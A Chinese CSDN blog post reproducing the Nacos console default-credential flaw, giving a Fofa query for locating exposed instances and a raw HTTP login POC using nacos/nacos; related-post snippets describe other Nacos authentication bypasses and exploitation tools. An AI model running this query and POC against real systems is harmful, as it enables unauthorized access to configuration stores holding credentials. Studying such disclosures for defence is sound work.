【漏洞复现】Nacos 控制台默认口令漏洞

最新推荐文章于 2024-05-08 09:38:54 发布
最新推荐文章于 2024-05-08 09:38:54 发布
阅读量353 收藏
点赞数 5
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/138268457
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

漏洞描述:

Nacos控制台默认口令漏洞是一个重要的安全问题,它涉及到未经授权的访问风险。在Nacos的某些版本中,如果使用了默认的口令或密钥,攻击者可能会利用这些默认设置来绕过身份认证,直接获得对Nacos的访问权限。

搜索语法:

Fofa-Query: ip.port=="8848" and title=="HTTP Status 404 – Not Found"

漏洞详情:

1.Nacos服务系统。

2.漏洞POC:

POST /nacos/v1/auth/users/login HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Host: {{Hostname}}
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 29
Connection: close

username=nacos&password=nacos

3.漏洞复现结果。

晚风不及你ღ
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录

已下架不支持订阅

Alibaba Nacos存在默认口令漏洞
nnn2188185的博客
03-18 2099
Nacos是阿里巴巴最新开源的项目。 Alibaba Nacos存在弱口令漏洞。攻击者利用默认弱密码登录系统后台,获取敏感信息。
SexyBeast233#SecBooks#Alibaba Nacos 控制台默认口令1
07-25
Alibaba Nacos 控制台默认口令漏洞描述Alibaba Nacos 控制台存在默认口令 nacos/nacos,可登录后台查看敏感信息漏洞影响漏洞
(20240205)网络安全检查常见漏洞及修复建议
weixin_44787474的博客
02-05 786
网络安全检查常见漏洞及修复建议,保证业务系统及数据安全
Nacos身份认证权限绕过+漏洞利用工具分享
zkaqlaoniao的博客
12-26 1028
单点登录是现在广泛使用的JWT的一个特性,因为它的开销很小,并且可以轻松地跨域使用。该信息可以被验证和信任,因为它是数字签名的。为了得到签名部分,你必须有编码过的header、编码过的payload、一个秘钥,签名算法是header中指定的那个,然对它们签名即可。4.复制上面得到的值,抓包修改包,添加Authorization值,发送到nacos,获取到登录成功的带有token的响应包。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
Nacos漏洞总结复现
cc123489ll的博客
05-08 1017
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
漏洞实战(1):NACOS默认密钥漏洞QVD-2023-6271
OneMoreThink
03-09 3005
原理危害攻击资产发现漏洞利用防御1、原理NACOS[1],/nɑ:kəʊs/,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。在<=2.2.0、<=1.4.4的版本中,NACOS的配置文件conf/application.properties存在默认密钥nacos.core.auth.plugin.nacos.token.secret.key=SecretKey01...
edusrc系列(二):Nacos从弱口令到任意用户信息修改
weixin_67488888的博客
09-13 865
Nacos 是阿里巴巴推出来的一个新开源项目,这是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。但就是这样一个为我们带来方便的系统,也避免不了存在安全问题。xxx学院某域名下搭建了该系统,并且存在相关安全问题。弱口令为:nacos/nacos。http://media.xxx.edu.cn:8888/nacos 是会跳转的。方式提交,增加相应请求体字段,成功添加用户。
NACOS漏洞深入解析(审计+复现
qq_49849300的博客
03-27 4777
目前攻防对抗实战中,Nacos的环境遇到非常多,并且无一例外都没有开启auth,很多防守方甚至只是用防火墙阻断网上公开的那几条exp利用的关键地址,Nacos里面保存了企业很多的配置文件比如数据库连接信息、AK/SK信息等等,拿到账号密码等信息之后用来做密码本,然后再进行内网横向,杀伤力非常之大。看一下/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigController.java文件中369行开始的代码。
Nacos控制台简介.pdf
最新发布
06-20
Nacos 控制台主要旨在于增强对于服务列表,健康状态管理,服务治理,分布式配置管理等方面的管控能力,以便进一步帮助用户降低管理微服务应用架构的成本。
nacos-server-1.1.4.tar(Nacos控制台Nacos服务端)
11-06
Nacos的服务台程序。Spring-Cloud-Alibaba中的服务治理采用了Nacos,只需要解压资源后,运行bin目录下的开始脚本即可,支持Linux,Windows,Mac系统。1.1.4是截止到目前2019年11月的最新版本。
Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞的检测).zip
03-05
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用!...Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
Nacos2.2.2增加鉴权配置,防止NACOS身份登陆绕过漏洞
06-04
Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service的首字母简称,一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组...
Nacos全面解析
qq_45443475的博客
08-29 1万+
Nacos全面解析
Nacos默认用户名和密码
热门推荐
域名转让:chinabeaut.com、unienv.com
11-29 3万+
nacos/nacos
Nacos未授权访问漏洞
00勇士王子的博客
02-27 6250
一般来说,nacos被建议部署在内网中,如果在外网出现,会有很大的风险。
nacos未授权-CVE-2021-29441复现
crowsec
07-21 7573
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。 该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单。。。...
渗透测试--Nacos系统
qq_53003652的博客
11-25 2472
nacos是指,阿里为 SpringCloud 贡献了一个子项目,叫做 SpringCloud Alibaba,其中包括了微服务开发中的几个基础组件,Nacos 就是此项目中的一项技术。可以实现服务注册中心、分布式配置中心。针对微服务架构中的服务发现、配置管理、服务治理的综合型解决方案。Nacos在攻防实战中也是经常遇到,大多数布置是在内网,但是公网上也是有不少的,因为其存在多个漏洞,师傅们也是通过nacos拿下了不少分数。
SpringCloud快速学习(7)——nacos
qq_50665031的博客
07-21 6491
Nacos致力于发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos帮助您更敏捷和容易地构建、交付和管理微服务平台。Nacos是构建以“服务”为中心的现代应用架构(例如微服务范式、云原生范式)的服务基础设施。...
Nacos 控制台如何进入
05-31
进入 Nacos 控制台的步骤如下: 1. 首先确保你已经启动了 Nacos 服务。 2. 在浏览器中输入 `http://<Nacos IP 地址>:<Nacos 端口号>/nacos`,然后按下回车键。 例如,如果你的 Nacos IP 地址是 `127.0.0.1`,端口号是 `8848`,那么你可以在浏览器中输入 `http://127.0.0.1:8848/nacos`。 3. 输入 Nacos 控制台的用户名和密码,然后点击登录按钮即可。 默认情况下,Nacos 控制台的用户名是 `nacos`,密码是 `nacos`。你可以在 Nacos 的配置文件中进行修改。 4. 登录成功后,你就可以在 Nacos 控制台中对服务进行管理和配置了。 需要注意的是,如果你在 Docker 中启动了 Nacos 服务,那么你需要将 Nacos 容器的端口映射到主机上,才能在浏览器中访问 Nacos 控制台。具体的端口映射命令可以参考 Docker 的相关文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值